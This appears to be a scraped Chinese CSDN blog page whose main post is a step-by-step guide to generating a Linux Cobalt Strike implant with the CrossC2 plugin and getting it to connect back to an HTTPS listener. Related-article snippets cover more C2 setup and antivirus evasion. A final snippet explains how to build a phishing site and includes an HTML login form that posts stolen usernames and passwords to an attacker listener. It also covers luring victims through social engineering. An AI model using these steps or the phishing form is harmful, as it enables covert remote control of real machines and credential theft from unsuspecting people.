cs也能上线liunx马??你会吗???解决木马生成的操作。

最新推荐文章于 2024-12-20 16:54:42 发布
最新推荐文章于 2024-12-20 16:54:42 发布
阅读量784 收藏 12
点赞数 6
CC 4.0 BY-SA版权
文章标签: 学习 网络安全 内网渗透 liunx 日常学习总结 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/helloKittywz/article/details/140299100

我们都知道的cs是默认是windows的,不能进行上线liunx的马,这个时候我们就要使用插件来解决这个问题,因为我们在内网环境中,不可能只有windows主机的,我们会有liunx系统的,所以我们要使用cs的插件来解决这个问题。我看网上的我都没有成功,我来说说我的配置,希望可以帮助到大家。

我的是kali为cs的服务端  然后我的win10为cs的客户端来进行操作。

liunx木马生成准备操作:

gloxec/CrossC2: generate CobaltStrike's cross-platform payload (github.com)

首先下载配置文件,然后我们是服务端是什么系统我们就下载什么系统来进行操作。

下载好了我们要改一下里面的配置文件

这3个都是插件要的

一个是我们在kail上面的地址     一个是我们的系统

 配置好了过后我们要注意那个key,在服务器里面是cs里面有这个文件,我们要拷贝到客户端进行操作。他是隐藏的文件我们要输入la -all才可以看见这个文件

 前面都准备好了过后,我们就要启动cs服务器,然后cs的客户端

我们要在cs客户端配置监听器,这个liunx上线只能是https的监听器,我们来看看操作。

导入了插件会头上会出现cs2的表示,然后我们在进行生成的liunx的操作。

 监听器你们就自己配置,记住选择https就行了

然后123是我监听器名字   下面是木马的名字

然后在cs日志可以看见命令的操作,我们在进行复制到kali里面进行生成的操作就行了。

 

也是生成成功了,我们在当前的目录找出来然后给他赋予权限,在进行执行就行了

我复制过来不行。我们去掉前面的路径直接执行程序就行了。

上线操作:

看结果:

 来看cs客户端看上线没有

 成功解决liunx上线马的操作。

我来说一下注意点:

第一:路径不要选择错误了

第二:我们的key在服务端要复制到客户端

第三:命令的时候可以去掉前面的路径然后在进行执行

第四:我们在使用的时候可能是cs版本不对,我的是4.8然后没成功,后面换成4.7就过了这点也可以是失败点的问题。

 

helloKittywz
关注
红蓝对抗--sliver 搭建
问题很多的小明
12-04 2373
sliver C2搭建与安装过程
基于linux系统的CS模型实现
慎薇的博客
08-11 1160
(一) CS模型也就是TCP的客户/服务器模型,我们这里用一个简单的回射客户/服务器模型来进行模拟验证。客户发送数据,服务器接收到数据,并将数据原封不动的返回给客户端。
cs实现上线linux主机与CrossC2的配置
热门推荐
Shanfenglan's blog
10-12 14万+
CATALOG前言配置CS与CrossC2简单的使用 前言 CS主要用来做windows渗透,现通过CrossC2插件即可实现上线linux主机。 CrossC2下载 CrossC2官方手册 其他须知: 目前只支持cs3.14版本,经测试,4.0版本可以上线主机但无法执行其他任何操作。 配置CS与CrossC2 下载完成CrossC2后打开CrossC2.cna文件 修改CC2_PATH路径为当前路径,并检查CC2_BIN文件类型是否与当前系统一致 将服务端的CS根目录下的文件复制到Cross
解决cs不能生成Linux木马的问题
weixin_65582330的博客
03-02 1143
要下载的是上面圈起来的两个就行了 ,genCrossC2的文件类型主要是看你客户端的主机是什么系统,如果你是linux就下linux,如果是windows就下win,以此类推。接下来看操作,这里我的客户端是windows,所以下载windows的。服务端自动生成 .cobaltstrike.beacon_keys,如果没有重新导入几次,然后把这个文件放到CrossC2插件文件夹下,这个文件很重要,是CS的密钥文件,因为CrossC2插件仅支持 reverse_https 协议。下载插件:CrossC2。
CS通过CrossC2插件上线linux主机
Workers77的博客
05-16 2768
最近隔离在家打完公司靶场闲着没啥事,刚好看到同事写的一篇Cobalt Strike利用CrossC2插件上线linux主机的文章,看着挺简单的于是想着整一个,顺便学习下。(搭建的时候由于比较菜踩了不少坑,最终在公司大佬的指点下装起来了) 项目地址 Releases · gloxec/CrossC2 · GitHub 正在上传…重新上传取消 把下载下来的文件放在一个文件夹内,然后开始配置CrossC2.cna文件。 这个文件只需要修改下$CC2_PATH和$CC2_PATH两个位置就行 $CC2..
cs上线linux主机
逍遥小哥的博客
01-19 1671
cobaltstike默认只生成windows载荷,不能上线linux主机,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac).由于我们cs客户端是在windows生成木马,就下载win版的crossC2就行。把此文件.cobaltstrike.beacon_keys 文件放到客户端cs的文件夹里。和我上面的命令一样啊,感觉就是配了个路径的环境变量,执行起了更加方便了。这就是生成成功,会在cs客户端目录生成木马文件, 我这里生成了两个。然后把我们刚才用第二个方式生成木马文件丢上去。
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 3178
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
CS上线Linux--坑太多了
em.....
05-31 3411
CS上线Linux–坑太多了 文章目录CS上线Linux--坑太多了1.1 前期准备1.2 安装1.3 反弹shell 传统的Cs只能上线windows,而有时为了方便想将Linux主机上线Cs,这个时候就需要使用CrossC2插件 1.1 前期准备 #下载指定版本 https://github.com/gloxec/CrossC2/releases/tag/v2.2.4 我这里在Windows上展示,所以下的Windows 然后下载cna **下载地址:**https://github.com.
cs插件CrossC2——上线Linux系统
ygylemon的博客
12-20 723
我这之前已经生成一个testC2.out文件了,所以改个名,看见下方的success证明生成成功!然后运行testC2文件,成功上线!(如果不行,加权限chmod +x testC2.out)在cs创建监听,配置如下,一定要https监听才可以!,cs的可拓展性非常强大,以后会陆续更新各种插件!目前只支持反向的HTTPS连接和正向的TCP连接。需要把keys文件复制到C2文件夹里,命令如下。在日志管理界面会生成一串日志,用他来生成木马。加载cna文件,然后会出现下面的图标。介绍一款非常强大的cs插件。
关于CS上线Linux主机(CrossC2)
Adminxe的博客
07-11 2756
0x01 前言 Cross C2是一个支持Linux & MacOS系统的拓展插件,支持用户自定义生成的动态库,以无文件落地的方式从内存中加载执行动态库或可执行文件。用法我的想法来说,相当于一个小集群,插件化方便利用,实际的渗透中意义并不大,更加实际于命令行渗透,做到无文件落地,过流量检测加密免杀等技术的研究。 简而言之:一个CS的简单小插件,目的就是上线Linux主机, 可做一些简单的操作,记录一下使用过程中遇到的一些问题,并且在使用中操作的正确性。 Cross c2支持架构说明: ..
内网渗透Linux上线
剁椒鱼头没剁椒的博客
06-12 4040
默认情况下CS是不支持上线Linux的,只支持上线Windows,但是再事情的渗透测试过程中,一般企业重用的业务通常都是运行再Linux上的,这就会导致原版的CS无法上线Linux,而这时候可以使用crossC2插件来解决这个问题。
cobaltstrike进阶篇之linux上线linux
weixin_69925635的博客
06-05 863
cs的部署和基本上线过程可以参考我前面一篇文章,接下来尝试利用linux(服务端和客户端都放在同一台kali上)上线linux(ubuntu)将CrossC2-GithubBot-2023-03-27.cna其中path改成genCrossC2.linux的path。选择CSversion为4.4,日志中出现success,在指定目录下出现t_cc2.out,传到靶机并双击运行,成功上线。这个时候cs顶部会多出来一个选项,选择创建一个c2监听器,在之前需要先创建一个https的监听器。
反弹木马——本质上就是一个开80端口的CS程序,伪造自己在浏览网页
djph26741的博客
10-11 516
反弹端口型木马分析了防火墙的特性后发现:防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口,木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口,为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端...
通过CrossC2上线CS踩坑记(Linux)
ATpiu的博客
08-07 5378
Linux下,通过CrossC2上线CS,自定义profile
基础CobaltStrike上线Linux主机
战神/calmness的博客
07-24 722
准备环境 1、(CrossC2) CrossC2-cs4.1\src\CrossC2.cna https://download.csdn.net/download/weixin_43650289/20447236 2、LINUX云服务器 3、C2插件genCrossC2.Linux 上传至Cobaltstrike3.14目录下 https://download.csdn.net/download/weixin_43650289/20447188 4、云服务器 5、CobaltStrike3.
cs搭建和木马投放
weixin_48776804的博客
03-04 2571
cs搭建和木马投放
CS木马的几种上线方式总结
Shanfenglan's blog
10-20 13万+
CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机 前言 CS上线方式还是有不少的,但是时间长不看容易忘记一部分,博客记录也比较分散导致找起来比较麻烦,因此写了这篇博客记录一下CS上线的相关知识点。 windows相关上线方式 1.利用mshta与wmic上线 不用powershell执行powershell脚本与xsl文件不落地上线 2.利用powershell上
cs木马制作与于远程控制
2301_79580906的博客
07-14 1359
cs木马制作与远控
kali linux cs钓鱼网站
最新发布
02-28
### 使用 Cobalt Strike 在 Kali Linux 上创建和配置钓鱼网站 #### 准备工作 为了在 Kali Linux 中使用 Cobalt Strike 创建并配置钓鱼网站,需先确保已成功安装 Cobalt Strike 并启动其服务[^1]。 #### 配置监听器 通过图形界面进入 Cobalt Strike 的 Team Server 后,在菜单栏找到 `Listeners` -> `HTTP/HTTPS` 来设置Web请求转发规则。这里可以选择启用 HTTPS 提供更安全的通信渠道,并指定用于接收受害者访问请求的具体端口以及URL路径等参数[^2]。 #### 构建恶意载荷 利用内置工具生成适用于不同场景下的有效负载文件(payload),比如 Windows 下可执行程序(.exe),这些都将作为伪装成合法软件分发给潜在的目标对象下载运行。对于构建钓鱼页面而言,则应选择适合浏览器环境加载的形式如 JavaScript 或者 Flash 类型的有效载荷。 #### 设计钓鱼页面 借助 HTML/CSS 技术精心打造一个看似正规机构官方网站登录入口或其他敏感信息收集表单样式的网页副本;同时嵌入之前准备好的恶意脚本链接地址到该伪造站点内以便于当用户点击提交按钮时触发植入木马的行为或将输入的数据回传至攻击者的服务器上保存下来待后续分析处理。 ```html <form action="http://your_cobalt_strike_listener_url" method="POST"> Username:<br> <input type="text" name="username"><br> Password:<br> <input type="password" name="password"><br><br> <input type="submit" value="Submit"> </form> ``` #### 发布与传播 最后一步就是考虑怎样把做好的假网站推送给预期受众群体面前了,这可能涉及到社会工程学技巧的应用,例如发送带有指向虚假资源链接邮件附件、即时通讯消息或是社交媒体分享帖子等方式诱导对方打开含有危险成分的内容从而实现控制目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值